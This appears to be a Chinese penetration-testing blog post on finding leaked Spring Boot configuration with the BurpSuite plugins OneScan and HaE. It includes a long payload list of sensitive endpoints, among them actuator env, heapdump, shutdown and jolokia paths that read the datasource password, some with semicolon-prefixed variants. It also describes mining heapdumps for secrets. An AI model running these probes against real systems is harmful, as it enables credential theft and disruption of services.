写在开始

下面说一下一些渗透SpringBoot时使用的BurpSuite插件和寻找漏洞的思路,主要是找特定文件来找一些泄漏的配置

操作过程

安装OneScanHaE
2023-08-04T02:28:38.png
点到OneScan的Dashboard里,点开Listen Proxy Message
2023-08-04T02:29:10.png
然后Payload里Clear然后Paste一些判断
2023-08-04T02:29:20.png

/api/swagger.json 
/v2/swagger.json 
/api/swagger.json 
/v2/api-docs 
/api-doc 
/swagger-resources 
/druid/index.html 
/services 
/admin 
/actuator 
/api/actuator 
/APPWebService 
/v3/api-docs 
/env 
/trace 
/api/v2/api-docs 
/v2/api-docs; 
/actuator; 
/js/ueditor/ueditor.config.js 
/nacos/index.html 
/jeecg-boot/ 
/ueditor/ueditor.config.js 
/getUserInfo 
/v1/api-docs 
/OfficeServer.jsp 
/APPWebService/AppService.asmx 
/js/config.js 
/env; 
/druid/login.html 
/druid/index.html 
/druid/basic.json 
/autoconfig 
/auditevents 
/configprops 
/dump 
/env 
/env/java.home 
/features 
/health 
/heapdump 
/logfile 
/loggers 
/jolokia 
/jolokia/list 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password 
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url 
/mappings 
/metrics/mem 
/metrics/ 
/restart 
/trace 
/actuator/druid/login.html 
/actuator/autoconfig 
/actuator/auditevents 
/actuator/configprops 
/actuator/beans 
/actuator/dump 
/actuator/env 
/actuator/env/java.home 
/actuator/features 
/actuator/health 
/actuator/heapdump 
/actuator/info 
/actuator/logfile 
/actuator/loggers 
/actuator/jolokia 
/actuator/jolokia/list 
/actuator/shutdown 
/actuator/trace 
/nacos 
;/api/swagger.json 
;/v2/swagger.json 
;/api/swagger.json 
;/v2/api-docs 
;/api-doc 
;/swagger-resources 
;/druid/index.html 
;/services 
;/actuator 
;/api/actuator 
;/APPWebService 
;/v3/api-docs 
;/env 
;/trace 
;/api/v2/api-docs 
;/v2/api-docs; 
;/actuator; 
;/js/ueditor/ueditor.config.js 
;/nacos/index.html 
;/jeecg-boot/ 
;/ueditor/ueditor.config.js 
;/getUserInfo 
;/v1/api-docs 
;/OfficeServer.jsp 
;/js/config.js 
;/env; 
;/druid/login.html 
;/druid/index.html 
;/druid/basic.json 
;/autoconfig 
;/auditevents 
;/configprops 
;/dump 
;/env 
;/env/java.home 
;/features 
;/health 
;/heapdump 
;/logfile 
;/loggers 
;/jolokia 
;/jolokia/list 
;/jolokia/exec/org.springframework

然后Other中再加载一下HaE
2023-08-04T02:29:43.png
点到HaE之后在Rules添加一条
2023-08-04T02:29:50.png
Regex设置为(\{\"\_links\"\:\{\"self),后面按照上图设置。
之后回到Proxy里打开浏览器访问页面
2023-08-04T02:29:56.png
可以看到上面设置的红色高亮
2023-08-04T02:30:07.png
检查一下内容,主要看env和heapdump
2023-08-04T02:30:34.png
2023-08-04T02:30:40.png
打开env的url查看
2023-08-04T02:30:50.png
丢vscode中格式化
2023-08-04T02:40:08.png
查看其中有啥重要信息没
heapdump使用JDumpSpider查看内容
2023-08-04T02:31:01.png

写在最后

这个主要是找一些对应的文件,找对应的泄漏配置就行了,对应工具的链接放在了对应位置自行下载

Last modification:August 4, 2023
© Allow specification reprint
如果觉得我的文章对你有用,请随意赞赏